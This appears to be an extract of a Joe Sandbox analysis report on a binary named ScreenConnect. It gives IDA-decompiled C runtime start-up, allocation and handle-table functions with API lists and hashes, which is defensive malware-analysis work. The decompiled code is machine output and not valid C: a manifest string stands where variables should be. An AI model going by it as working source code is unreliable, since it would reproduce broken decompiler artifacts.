                                                                          				_t23 = E003F3970(_t49); // executed
                                                                          				 *0x40519c = _t23;
                                                                          				_t24 = E003F331D();
                                                                          				_t60 = _t24;
                                                                          				if(_t24 < 0) {
                                                                          					E003F22CB(_t39, _t49, _t50, _t52, _t60, 8);
                                                                          				}
                                                                          				_t25 = E003F354C(_t39, _t49, _t50, _t52);
                                                                          				_t61 = _t25;
                                                                          				if(_t25 < 0) {
                                                                          					E003F22CB(_t39, _t49, _t50, _t52, _t61, 9);
                                                                          				}
                                                                          				_t26 = E003F2305(1); // executed
                                                                          				_t62 = _t26;
                                                                          				if(_t26 != 0) {
                                                                          					E003F22CB(_t39, _t49, _t50, _t52, _t62, _t26);
                                                                          				}
                                                                          				_t27 = E003F3DDE();
                                                                          				_push(_t52);
                                                                          				_push(_t27);
                                                                          				_push(0);
                                                                          				_push(0x3f0000); // executed
                                                                          				_t28 = E003F1880(); // executed
                                                                          				_t53 = _t28;
                                                                          				 *((intOrPtr*)(_t54 - 0x24)) = _t28;
                                                                          				if(_t39 == 0) {
                                                                          					E003F256E(_t53);
                                                                          				}
                                                                          				E003F22F6();
                                                                          				 *(_t54 - 4) = 0xfffffffe;
                                                                          				return E003F26D5(_t53);
                                                                          			}


                                                                          APIs
                                                                          • ___security_init_cookie.LIBCMT ref: 003F1DFE
                                                                          • ___crtGetShowWindowMode.LIBCMT ref: 003F1E14
                                                                            • Part of subcall function 003F3A7B: GetStartupInfoW.KERNEL32(?), ref: 003F3A85
                                                                          • _fast_error_exit.LIBCMT ref: 003F1E77
                                                                          • _fast_error_exit.LIBCMT ref: 003F1E88
                                                                          • __RTC_Initialize.LIBCMT ref: 003F1E8E
                                                                          • _fast_error_exit.LIBCMT ref: 003F1EA2
                                                                          • GetCommandLineA.KERNEL32(00402AF0,00000014), ref: 003F1EA8
                                                                          • ___crtGetEnvironmentStringsA.LIBCMT ref: 003F1EB3
                                                                          • __setargv.LIBCMT ref: 003F1EBD
                                                                          • __setenvp.LIBCMT ref: 003F1ECE
                                                                          • __cinit.LIBCMT ref: 003F1EE1
                                                                          • __wincmdln.LIBCMT ref: 003F1EF2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: _fast_error_exit$___crt$CommandEnvironmentInfoInitializeLineModeShowStartupStringsWindow___security_init_cookie__cinit__setargv__setenvp__wincmdln
                                                                          • String ID: .$
                                                                          • API String ID: 4062026167-2223841709
                                                                          • Opcode ID: 574d10505e20723f1eb78015812a0d55340cd0a32efdaff969138383a23ac257
                                                                          • Instruction ID: e5c793178c9147dd64f145f9e63d90ef194d6908f7f7c2f91a3adea90c933e83
                                                                          • Opcode Fuzzy Hash: 574d10505e20723f1eb78015812a0d55340cd0a32efdaff969138383a23ac257
                                                                          • Instruction Fuzzy Hash: A321D670A4031EE9EB2777B6BD56B3F21586F10765F10052AFB04AE0D7DFB4C9409A61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 91%
                                                                          			E003F2FD6(void* __ebx, void* __edi, void* __eflags) {
                                                                          				void* __esi;
                                                                          				void* _t3;
                                                                          				intOrPtr _t6;
                                                                          				long* _t9;
                                                                          				long _t14;
                                                                          				long* _t27;
                                                                          
                                                                          				E003F239D(_t3);
                                                                          				if(E003F4B02() != 0) {
                                                                          					_t6 = E003F39FD(E003F2D67);
                                                                          					 *0x404180 = _t6;
                                                                          					__eflags = _t6 - 0xffffffff;
                                                                          					if(_t6 == 0xffffffff) {
                                                                          						goto L1;
                                                                          					} else {
                                                                          						_t9 = E003F25B3(1, 0x3bc); // executed
                                                                          						_t27 = _t9;
                                                                          						__eflags = _t27;
                                                                          						if(_t27 == 0) {
                                                                          							L6:
                                                                          							E003F304C();
                                                                          							__eflags = 0;
                                                                          							return 0;
                                                                          						} else {
                                                                          							__eflags = E003F3A59( *0x404180, _t27);
                                                                          							if(__eflags == 0) {
                                                                          								goto L6;
                                                                          							} else {
                                                                          								_push(0);
                                                                          								_push(_t27);
                                                                          								E003F2F23(__ebx, __edi, _t27, __eflags);
                                                                          								_t14 = GetCurrentThreadId();
                                                                          								_t27[1] = _t27[1] | 0xffffffff;
                                                                          								 *_t27 = _t14;
                                                                          								__eflags = 1;
                                                                          								return 1;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					L1:
                                                                          					E003F304C();
                                                                          					return 0;
                                                                          				}
                                                                          			}


                                                                          APIs
                                                                          • __init_pointers.LIBCMT ref: 003F2FD6
                                                                            • Part of subcall function 003F239D: RtlEncodePointer.NTDLL(00000000,?,003F2FDB,003F1E82,00402AF0,00000014), ref: 003F23A0
                                                                            • Part of subcall function 003F239D: __initp_misc_winsig.LIBCMT ref: 003F23BB
                                                                            • Part of subcall function 003F239D: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003F3B13
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003F3B27
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003F3B3A
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003F3B4D
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003F3B60
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003F3B73
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003F3B86
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003F3B99
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003F3BAC
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003F3BBF
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003F3BD2
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003F3BE5
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003F3BF8
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003F3C0B
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003F3C1E
                                                                            • Part of subcall function 003F239D: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003F3C31
                                                                          • __mtinitlocks.LIBCMT ref: 003F2FDB
                                                                          • __mtterm.LIBCMT ref: 003F2FE4
                                                                            • Part of subcall function 003F304C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003F2FE9,003F1E82,00402AF0,00000014), ref: 003F4A1C
                                                                            • Part of subcall function 003F304C: DeleteCriticalSection.KERNEL32(X]@,?,?,003F2FE9,003F1E82,00402AF0,00000014), ref: 003F4A45
                                                                          • __calloc_crt.LIBCMT ref: 003F3009
                                                                          • __initptd.LIBCMT ref: 003F302B
                                                                          • GetCurrentThreadId.KERNEL32 ref: 003F3032
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                          • String ID:
                                                                          • API String ID: 1500305132-0
                                                                          • Opcode ID: b48d0e42b039db5ec8026ee65ab4a134afd4ca2d1e26fe1ef094f5238ddc2096
                                                                          • Instruction ID: 7cce189e0b9573931447e6cd8fa5603b9c61c93af6b4446a077616e435d0eb53
                                                                          • Opcode Fuzzy Hash: b48d0e42b039db5ec8026ee65ab4a134afd4ca2d1e26fe1ef094f5238ddc2096
                                                                          • Instruction Fuzzy Hash: A6F0903251971EAAE6377775BC07B7B2A949F01B30B21062BF765DC0D2FF68CA408195
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph: [graph image not reproduced in this extract]
                                                                          C-Code - Quality: 100%
                                                                          			E003F5D05() {
                                                                          				intOrPtr _t3;
                                                                          				intOrPtr _t4;
                                                                          				void* _t6;
                                                                          				intOrPtr _t9;
                                                                          				void* _t12;
                                                                          				intOrPtr _t13;
                                                                          
                                                                          				_t3 =  *0x406f84; // 0x200
                                                                          				_t13 = 0x14;
                                                                          				if(_t3 != 0) {
                                                                          					if(_t3 < _t13) {
                                                                          						_t3 = _t13;
                                                                          						goto L4;
                                                                          					}
                                                                          				} else {
                                                                          					_t3 = 0x200;
                                                                          					L4:
                                                                          					 *0x406f84 = _t3;
                                                                          				}
                                                                          				_t4 = E003F25B3(_t3, 4); // executed
                                                                          				 *0x406f80 = _t4;
                                                                          				if(_t4 != 0) {
                                                                          					L8:
                                                                          					_t12 = 0;
                                                                          					_t9 = 0x404a68;
                                                                          					while(1) {
                                                                          						 *((intOrPtr*)(_t12 + _t4)) = _t9;
                                                                          						_t9 = _t9 + 0x20;
                                                                          						_t12 = _t12 + 4;
                                                                          						if(_t9 >= 0x404ce8) {
                                                                          							break;
                                                                          						}
                                                                          						_t4 =  *0x406f80; // 0x979dc8
                                                                          					}
                                                                          					return 0;
                                                                          				} else {
                                                                          					 *0x406f84 = _t13;
                                                                          					_t4 = E003F25B3(_t13, 4);
                                                                          					 *0x406f80 = _t4;
                                                                          					if(_t4 != 0) {
                                                                          						goto L8;
                                                                          					} else {
                                                                          						_t6 = 0x1a;
                                                                          						return _t6;
                                                                          					}
                                                                          				}
                                                                          			}


                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: __calloc_crt
                                                                          • String ID: hJ@$L@
                                                                          • API String ID: 3494438863-1775958390
                                                                          • Opcode ID: f9d1ea8d9996456fa02ce4308879fcf182205fc7a91abccda4992ba7f9c685da
                                                                          • Instruction ID: 72396510360b01b77444b7b4dd76f1d8f786ca57dec29c75cb0fe8fc030f2fa7
                                                                          • Opcode Fuzzy Hash: f9d1ea8d9996456fa02ce4308879fcf182205fc7a91abccda4992ba7f9c685da
                                                                          • Instruction Fuzzy Hash: 75F0C27130AA0B9EFB26DB29BE0577527D8F745720F12017BF709EE2A4E77488409798
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph: [graph image not reproduced in this extract]
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 003F10D7
                                                                          • SysAllocString.OLEAUT32(?), ref: 003F10F8
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 003F113D
                                                                          • VariantClear.OLEAUT32(?), ref: 003F1147
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: StringVariant$AllocClearFreeInit
                                                                          • String ID:
                                                                          • API String ID: 760788290-0
                                                                          • Opcode ID: 8fcd694f5bd9a4fee63cd93d588a31b4d4a102192f00ad5c5b568e42feec3533
                                                                          • Instruction ID: 05610f24eccca29ff4a060663569f6004ecfa2ea214cc934024ed029154e0cb7
                                                                          • Opcode Fuzzy Hash: 8fcd694f5bd9a4fee63cd93d588a31b4d4a102192f00ad5c5b568e42feec3533
                                                                          • Instruction Fuzzy Hash: 5C215E72D40658EBCB129BA9DC05BEEBBB8EF49710F104216F940B6350EB754500C690
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Control-flow Graph: [graph image not reproduced in this extract]
                                                                          C-Code - Quality: 85%
                                                                          			E003F3069(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                          				signed int* _t82;
                                                                          				signed int _t86;
                                                                          				long _t90;
                                                                          				void* _t91;
                                                                          				intOrPtr _t94;
                                                                          				signed int _t98;
                                                                          				signed int _t99;
                                                                          				signed char _t103;
                                                                          				void** _t105;
                                                                          				void** _t106;
                                                                          				void** _t109;
                                                                          				signed char _t111;
                                                                          				long _t119;
                                                                          				void* _t129;
                                                                          				signed int* _t133;
                                                                          				void* _t135;
                                                                          				signed int* _t138;
                                                                          				void** _t139;
                                                                          				void* _t141;
                                                                          				signed int _t142;
                                                                          				signed int _t143;
                                                                          				void** _t147;
                                                                          				signed int _t149;
                                                                          				void* _t150;
                                                                          				void** _t154;
                                                                          				void* _t155;
                                                                          				void* _t156;
                                                                          
                                                                          				_push(0x64);
                                                                          				_push(0x402bf0);
                                                                          				E003F2690(__ebx, __edi, __esi);
                                                                          				E003F49D1(0xb);
                                                                          				 *(_t155 - 4) = 0;
                                                                          				_push(0x40);
                                                                          				_t141 = 0x20;
                                                                          				_push(_t141);
                                                                          				_t82 = E003F25B3();
                                                                          				_t133 = _t82;
                                                                          				 *(_t155 - 0x24) = _t133;
                                                                          				if(_t133 != 0) {
                                                                          					"\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n" = _t82;
                                                                          					 *0x407024 = _t141;
                                                                          					while(_t133 <  &(_t82[0x200])) {
                                                                          						_t133[1] = 0xa00;
                                                                          						 *_t133 =  *_t133 | 0xffffffff;
                                                                          						_t133[2] = 0;
                                                                          						_t133[9] = _t133[9] & 0x00000080;
                                                                          						_t133[9] = _t133[9] & 0x0000007f;
                                                                          						_t133[9] = 0xa0a;
                                                                          						_t133[0xe] = 0;
                                                                          						_t133[0xd] = 0;
                                                                          						_t133 =  &(_t133[0x10]);
                                                                          						 *(_t155 - 0x24) = _t133;
                                                                          						_t82 = "\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n"; // 0x978218
                                                                          					}
                                                                          					GetStartupInfoW(_t155 - 0x74);
                                                                          					if( *((short*)(_t155 - 0x42)) == 0) {
                                                                          						L27:
                                                                          						_t129 = 0xfffffffe;
                                                                          						L28:
                                                                          						_t142 = 0;
                                                                          						while(1) {
                                                                          							 *(_t155 - 0x2c) = _t142;
                                                                          							if(_t142 >= 3) {
                                                                          								break;
                                                                          							}
                                                                          							_t147 = "\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n" + (_t142 << 6);
                                                                          							 *(_t155 - 0x24) = _t147;
                                                                          							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
                                                                          								_t147[1] = 0x81;
                                                                          								if(_t142 != 0) {
                                                                          									_t65 = _t142 - 1; // -1
                                                                          									asm("sbb eax, eax");
                                                                          									_t90 =  ~_t65 + 0xfffffff5;
                                                                          								} else {
                                                                          									_t90 = 0xfffffff6;
                                                                          								}
                                                                          								_t91 = GetStdHandle(_t90);
                                                                          								 *(_t155 - 0x1c) = _t91;
                                                                          								if(_t91 == 0xffffffff || _t91 == 0) {
                                                                          									L45:
                                                                          									_t147[1] = _t147[1] | 0x00000040;
                                                                          									 *_t147 = _t129;
                                                                          									_t94 =  *0x406f80; // 0x979dc8
                                                                          									if(_t94 != 0) {
                                                                          										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
                                                                          									}
                                                                          									goto L47;
                                                                          								} else {
                                                                          									_t98 = GetFileType(_t91);
                                                                          									if(_t98 == 0) {
                                                                          										goto L45;
                                                                          									}
                                                                          									 *_t147 =  *(_t155 - 0x1c);
                                                                          									_t99 = _t98 & 0x000000ff;
                                                                          									if(_t99 != 2) {
                                                                          										if(_t99 != 3) {
                                                                          											L44:
                                                                          											_t71 =  &(_t147[3]); // -4216068
                                                                          											E003F3A9E(_t71, 0xfa0, 0);
                                                                          											_t156 = _t156 + 0xc;
                                                                          											_t147[2] = _t147[2] + 1;
                                                                          											goto L47;
                                                                          										}
                                                                          										_t103 = _t147[1] | 0x00000008;
                                                                          										L43:
                                                                          										_t147[1] = _t103;
                                                                          										goto L44;
                                                                          									}
                                                                          									_t103 = _t147[1] | 0x00000040;
                                                                          									goto L43;
                                                                          								}
                                                                          							} else {
                                                                          								_t147[1] = _t147[1] | 0x00000080;
                                                                          								L47:
                                                                          								_t142 = _t142 + 1;
                                                                          								continue;
                                                                          							}
                                                                          						}
                                                                          						 *(_t155 - 4) = _t129;
                                                                          						E003F3314();
                                                                          						_t86 = 0;
                                                                          						L49:
                                                                          						return E003F26D5(_t86);
                                                                          					}
                                                                          					_t105 =  *(_t155 - 0x40);
                                                                          					if(_t105 == 0) {
                                                                          						goto L27;
                                                                          					}
                                                                          					_t135 =  *_t105;
                                                                          					 *(_t155 - 0x1c) = _t135;
                                                                          					_t106 =  &(_t105[1]);
                                                                          					 *(_t155 - 0x28) = _t106;
                                                                          					 *(_t155 - 0x20) = _t106 + _t135;
                                                                          					if(_t135 >= 0x800) {
                                                                          						_t135 = 0x800;
                                                                          						 *(_t155 - 0x1c) = 0x800;
                                                                          					}
                                                                          					_t149 = 1;
                                                                          					 *(_t155 - 0x30) = 1;
                                                                          					while( *0x407024 < _t135) {
                                                                          						_t138 = E003F25B3(_t141, 0x40);
                                                                          						 *(_t155 - 0x24) = _t138;
                                                                          						if(_t138 != 0) {
                                                                          							("\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n")[_t149] = _t138;
                                                                          							 *0x407024 =  *0x407024 + _t141;
                                                                          							while(_t138 <  &(("\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n")[_t149][0x200])) {
                                                                          								_t138[1] = 0xa00;
                                                                          								 *_t138 =  *_t138 | 0xffffffff;
                                                                          								_t138[2] = 0;
                                                                          								_t138[9] = _t138[9] & 0x00000080;
                                                                          								_t138[9] = 0xa0a;
                                                                          								_t138[0xe] = 0;
                                                                          								_t138[0xd] = 0;
                                                                          								_t138 =  &(_t138[0x10]);
                                                                          								 *(_t155 - 0x24) = _t138;
                                                                          							}
                                                                          							_t149 = _t149 + 1;
                                                                          							 *(_t155 - 0x30) = _t149;
                                                                          							_t135 =  *(_t155 - 0x1c);
                                                                          							continue;
                                                                          						}
                                                                          						_t135 =  *0x407024;
                                                                          						 *(_t155 - 0x1c) = _t135;
                                                                          						break;
                                                                          					}
                                                                          					_t143 = 0;
                                                                          					 *(_t155 - 0x2c) = 0;
                                                                          					_t129 = 0xfffffffe;
                                                                          					_t109 =  *(_t155 - 0x28);
                                                                          					_t139 =  *(_t155 - 0x20);
                                                                          					while(_t143 < _t135) {
                                                                          						_t150 =  *_t139;
                                                                          						if(_t150 == 0xffffffff || _t150 == _t129) {
                                                                          							L22:
                                                                          							_t143 = _t143 + 1;
                                                                          							 *(_t155 - 0x2c) = _t143;
                                                                          							_t109 =  &(( *(_t155 - 0x28))[0]);
                                                                          							 *(_t155 - 0x28) = _t109;
                                                                          							_t139 =  &(_t139[1]);
                                                                          							 *(_t155 - 0x20) = _t139;
                                                                          							continue;
                                                                          						} else {
                                                                          							_t111 =  *_t109;
                                                                          							if((_t111 & 0x00000001) == 0) {
                                                                          								goto L22;
                                                                          							}
                                                                          							if((_t111 & 0x00000008) != 0) {
                                                                          								L20:
                                                                          								_t154 = ("\'?>\r\n<assembly xmlns=\'urn:schemas-microsoft-com:asm.v1\' manifestVersion=\'1.0\'>\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\'highestAvailable\' uiAccess=\'false\' />\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\r\n")[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                                                                          								 *(_t155 - 0x24) = _t154;
                                                                          								 *_t154 =  *_t139;
                                                                          								_t154[1] =  *( *(_t155 - 0x28));
                                                                          								_t37 =  &(_t154[3]); // 0xd
                                                                          								E003F3A9E(_t37, 0xfa0, 0);
                                                                          								_t156 = _t156 + 0xc;
                                                                          								_t154[2] = _t154[2] + 1;
                                                                          								_t139 =  *(_t155 - 0x20);
                                                                          								L21:
                                                                          								_t135 =  *(_t155 - 0x1c);
                                                                          								goto L22;
                                                                          							}
                                                                          							_t119 = GetFileType(_t150);
                                                                          							_t139 =  *(_t155 - 0x20);
                                                                          							if(_t119 == 0) {
                                                                          								goto L21;
                                                                          							}
                                                                          							goto L20;
                                                                          						}
                                                                          					}
                                                                          					goto L28;
                                                                          				}
                                                                          				_t86 = E003F5770(_t155, 0x404000, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                                                                          				goto L49;
                                                                          			}

                                                                          APIs
                                                                          • __lock.LIBCMT ref: 003F3077
                                                                            • Part of subcall function 003F49D1: __mtinitlocknum.LIBCMT ref: 003F49E3
                                                                            • Part of subcall function 003F49D1: EnterCriticalSection.KERNEL32(00000000,?,003F2F6C,0000000D), ref: 003F49FC
                                                                          • __calloc_crt.LIBCMT ref: 003F3088
                                                                            • Part of subcall function 003F25B3: __calloc_impl.LIBCMT ref: 003F25C2
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 003F30A3
                                                                          • GetStartupInfoW.KERNEL32(?,00402BF0,00000064,003F1E9C,00402AF0,00000014), ref: 003F30FC
                                                                          • __calloc_crt.LIBCMT ref: 003F3147
                                                                          • GetFileType.KERNEL32(00000001), ref: 003F3190
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                                                                          • String ID:
                                                                          • API String ID: 2772871689-0
                                                                          • Opcode ID: d034845fbbe69de6bc325e7480d7241f64ca999058d83b3b1b08929f79767040
                                                                          • Instruction ID: ee5fb58d836309d2a3e9586b246bc430052fdcf1b5eb0feea96e571d91fc31c5
                                                                          • Opcode Fuzzy Hash: d034845fbbe69de6bc325e7480d7241f64ca999058d83b3b1b08929f79767040
                                                                          • Instruction Fuzzy Hash: BB810671D043499FCB12CFA8C8416B9BBF0AF09324B24466ED6A6AB3D1D734DA42CB14
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph
                                                                          control_flow_graph 352 3f1b16-3f1b1a 353 3f216e-3f2174 352->353 354 3f2183-3f218e call 3f477c 353->354 357 3f2176-3f2181 call 3f493b 354->357 358 3f2190-3f2193 354->358 357->354 361 3f2194-3f21d4 call 3f4833 call 3f496e call 3f4871 357->361 368 3f21dd-3f21e1 361->368 369 3f21d6-3f21dc call 3f1b02 361->369 369->368
C-Code - Quality: 82%
			E003F1B16(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				// Allocation retry loop of the CRT operator new: call _malloc, give a
				// new-handler a chance to free memory on failure, otherwise throw
				// std::bad_alloc. CRT boilerplate, not sample-specific logic.
				intOrPtr _v0;
				char* _v20;
				signed char _v32;
				void* _t10;
				void* _t19;
				signed char* _t22;
				void* _t24;
				void* _t25;
				signed char* _t27;
				void* _t30;
				void* _t32;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				_pop(_t29);
				_t30 = _t32;
				while(1) {
					_t10 = E003F477C(_t19, _t24, _t25, _v0); // _malloc (ref 003F2186)
					if(_t10 != 0) {
						break;
					}
					// New-handler callback; returns 0 when no handler could free memory.
					// Identification as _callnewh is an assumption, the API list does not name it.
					if(E003F493B(_t10, _v0) == 0) {
						_push(1);
						_v20 = "bad allocation"; // what() text of std::bad_alloc
						_t22 =  &_v32;
						E003F4833(_t22,  &_v20); // std::exception::exception (ref 003F21A4)
						_v32 = 0x3fe2a0; // vftable pointer of the exception object
						E003F496E( &_v32, 0x402b0c); // __CxxThrowException@8 (ref 003F21B9) with throw info at 0x402b0c; does not return
						asm("int3"); // the decompiler ran past the noreturn throw into the code that follows it
						// What follows is the next function: a scalar deleting destructor pattern
						// (restore vftable, base destructor, optional operator delete) as far as
						// the calls allow to tell; not part of the allocation loop.
						_push(_t30);
						_t27 = _t22;
						 *_t27 = 0x3fe2a0;
						E003F4871(_t22);
						if((_v32 & 0x00000001) != 0) {
							E003F1B02(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L8:
				}
				return _t10;
				goto L8;
			}
Per-line addresses of the C-code above (0x00000000 where a line has no address): 0x003f1b16, 0x003f1b16, 0x003f1b16, 0x003f1b19, 0x003f216f, 0x003f2183, 0x003f2186, 0x003f218e, 0x00000000, 0x00000000, 0x003f2181, 0x003f2194, 0x003f2199, 0x003f21a1, 0x003f21a4, 0x003f21b1, 0x003f21b9, 0x003f21be, 0x003f21bf, 0x003f21c3, 0x003f21c5, 0x003f21cb, 0x003f21d4, 0x003f21d7, 0x003f21dc, 0x003f21e1, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x003f2181, 0x003f2193, 0x00000000

                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 003F2186
                                                                            • Part of subcall function 003F477C: __FF_MSGBANNER.LIBCMT ref: 003F4793
                                                                            • Part of subcall function 003F477C: __NMSG_WRITE.LIBCMT ref: 003F479A
                                                                            • Part of subcall function 003F477C: HeapAlloc.KERNEL32(00960000,00000000,00000001,00000000,00000000,00000000,?,003F2611,00000000,00000000,00000000,00000000,?,003F4A9B,00000018,00402C10), ref: 003F47BF
                                                                          • std::exception::exception.LIBCMT ref: 003F21A4
